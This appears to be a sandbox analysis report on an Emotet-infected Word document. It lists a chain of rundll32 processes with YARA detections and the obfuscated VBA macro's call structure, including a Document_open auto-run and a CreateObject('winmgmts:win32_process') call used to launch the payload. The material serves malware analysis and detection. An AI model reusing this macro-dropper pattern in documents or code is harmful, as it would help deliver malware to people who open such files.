Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2205331752.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2205236491.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2206333470.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 852 Parent PID: 2964

General

Start time:	10:32:35
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',nQAMXkchr
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2218317405.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2216606355.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2216643199.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2280 Parent PID: 852

General

Start time:	10:32:41
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2227039929.0000000000170000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2227064696.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2228163956.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 620 Parent PID: 2280

General

Start time:	10:32:46
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',ggJG
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2237290824.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2237360892.0000000000270000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2239757544.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1924 Parent PID: 620

General

Start time:	10:32:50
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2249797577.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2248449232.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2248357262.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2744 Parent PID: 1924

General

Start time:	10:32:56
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',dIFPdOFPiwZFUl
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2259337398.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2258739528.0000000000240000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2258693813.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2176 Parent PID: 2744

General

Start time:	10:33:00
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2269533338.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2270553779.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2269461275.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 532 Parent PID: 2176

General

Start time:	10:33:05
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',OpIYBjvoaiwa
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2280487586.0000000000150000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2280539965.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2281126017.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 2104 Parent PID: 532

General

Start time:	10:33:11
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2346045466.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2348582119.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2346073042.00000000002D0000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Bcur5699z4d

Declaration

Line	Content
1	Attribute VB_Name = "Bcur5699z4d"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 156, Strings: 0, Number of lines: 3, Relevance: 235.503

APIs	Meta Information
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: O9eax2mx6bn5xuv
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Content
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Bud375u79tqnjtr8hp
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: bebkDqAH
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: EWTFmUdCA
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: ueWFHDCC
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: yigPu
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: wTLHBUFzI
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: oSnKJGCv
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: NVFQOFAXs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: KoPDIC
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: vlZuYFCC
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: mJzxEXG
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: bssipAJC
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: IpndaHM
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Mid
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Name
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Application
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: lscaG
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: wgusFA
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: HpOdl
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: PAyxzTsC
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: sVBjGLE
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: RmTjACo
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: zjQpkF
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: ClofCvn
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: tFspDCJEJ
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: CreateObject
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rknGHpIJ
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: LGONCIz
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: chPFBOFy
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Mid
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Create
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Twt08i5xpa9fd0
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: L1e1dxo2wbinf3l6
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rlKgn
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: igIuH
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles
Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: QgrUG

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Xqcxarraokjbi	executed
11	End Sub

Module: Nst6otvnmgmpw

Declaration

Line	Content
1	Attribute VB_Name = "Nst6otvnmgmpw"

Executed Functions

Function Xqcxarraokjbi, APIs: 284, Strings: 140, Number of lines: 158, Relevance: 752.658

APIs	Meta Information
O9eax2mx6bn5xuv
Content
Bud375u79tqnjtr8hp
bebkDqAH
Paragraphs
EWTFmUdCA
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
ueWFHDCC
yigPu
Paragraphs
wTLHBUFzI
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
oSnKJGCv
NVFQOFAXs
Paragraphs
KoPDIC
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
vlZuYFCC
mJzxEXG
Paragraphs
bssipAJC
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
IpndaHM
Mid
Name
Application
lscaG
Paragraphs
wgusFA
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
HpOdl
PAyxzTsC
Paragraphs
sVBjGLE
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
RmTjACo
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC
zjQpkF
Paragraphs
ClofCvn
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
tFspDCJEJ
CreateObject	CreateObject("winmgmts:win32_process")
rknGHpIJ
Paragraphs
LGONCIz
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
chPFBOFy
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw
Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range
